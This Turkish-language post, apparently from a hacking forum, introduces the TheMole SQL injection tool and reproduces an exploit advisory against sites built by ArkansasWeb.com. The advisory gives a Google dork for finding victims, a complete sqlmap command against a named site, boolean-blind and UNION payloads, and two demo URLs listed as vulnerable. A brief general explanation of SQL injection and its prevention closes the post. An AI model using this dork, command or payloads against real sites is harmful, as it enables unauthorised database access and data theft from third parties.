Kali Linux TheMole Automatic SQL Injection Exploitation Tool

Selamun Aleyküm ...

Kali Linux TheMole otomatik SQL Enjeksiyon sömürme aracı

TheMole, bir komut satırı arabirimi SQL Enjeksiyon sömürme aracıdır.
Bu uygulama union-based, blind, boolean-based dayali Enjeksiyonlardan yararlanabilir.
The Mole, Mysql, Mssql ve Postgresql'i desteklemektedir;
apt-get update
apt-get install themole yazarak kurabilirsiniz.




ArkansasWeb.com Sql İnjection Vulnerability


[CODE]#################################################################################
# Exploit Title: ArkansasWeb.com Sql İnjection Vulnerability
# Author : Sipahiler & TURKZ.org
# Google Dork : intext:Web Design and Hosting by ArkansasWeb.com  & inurl:id=
# Vendor Home: https://www.arkansasweb.com/
# Tested on : Kali Linux 2017.1 Chrome, Firefox
# Date : 2017-10-11
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################

Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.employment4u.com/jobdescription.php?id=254"

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=254 AND 4058=4058

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=254 UNION ALL SELECT CONCAT(0x717a717171,0x4272554e774d6557774d6a714b694d697a4b43426f78524176614f626c7a4c6d75686359514d4a55,0x7171716b71),NULL,NULL,NULL,NULL,NULL,NULL#


Demo :
http://www.employment4u.com/jobdescription.php?id=254
http://www.ridgewoodtimbercorp.com/property.php?id=331

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & Odesa & TrazeR & Zer0Day & AKA_1NF4z & Kutluhan & Alianz & By_Dadas & S1R & Seytan6161 [/CODE]

SQL Enjeksiyonu Nedir?


SQL enjeksiyonu, veri odaklı uygulamalara saldırmak için kullanılan bir kod enjeksiyon yöntemidir. Bu güvenlik açığıyla, bir bilgisayar korsanı uygulamanın arka uç veritabanlarıyla olan etkileşimine müdahale edebilir, girdi gönderebilir. Bilgisayar korsanı, uygulamanın rastgele verilerini alabilir, mantığına müdahale edebilir veya veritabanı sunucusu üzerindeki komutları yürütebilir.

SQL yorumlanmış bir dildir ve web uygulamaları genellikle kullanıcı tarafından sağlanan verileri içeren SQL deyimleri oluşturur. Bu, güvensiz bir şekilde yapılırsa, uygulama SQL enjeksiyonuna karşı savunmasız hale gelecektir. Bu güvenlik açığı, web uygulamalarını etkileyen en ünlü güvenlik açıklarından biridir. En ciddi durumlarda, anonim bir bilgisayar korsanının veritabanında depolanan tüm verileri okumasını ve değiştirmesini ve hatta veritabanının çalıştığı sunucunun tam kontrolünü ele geçirmesini sağlayabilir.

Çoğu modern uygulama, bu güvenlik açığından, doğru kullanıldığında, SQL enjeksiyon saldırılarına karşı kendinden emin olan API'leri kullanarak önler. Yada savunma mekanizmaları kurarak sql saldırılarının önüne geçebilir.

SQL enjeksiyonunu keşfetmek bazen zorlu bir iştir ve tipik kontrollerin uygulanmadığı bir uygulamadaki bir veya iki örneği bulmak için ısrarcı olmayı gerektirir. Bu eğilim geliştikçe, SQL enjeksiyon parçalarını bulma ve kullanma yöntemleri, açıkların daha ince göstergelerini kullanarak daha gelişmiş ve güçlü sömürü teknikleri kullanarak geliştirilir.

SQL Enjeksiyonu önleme güvenlik açığının kurbanı olmaktan kaçınmanın anahtarı, kullanıcı girdilerini denetlemek ve doğrulamaktır.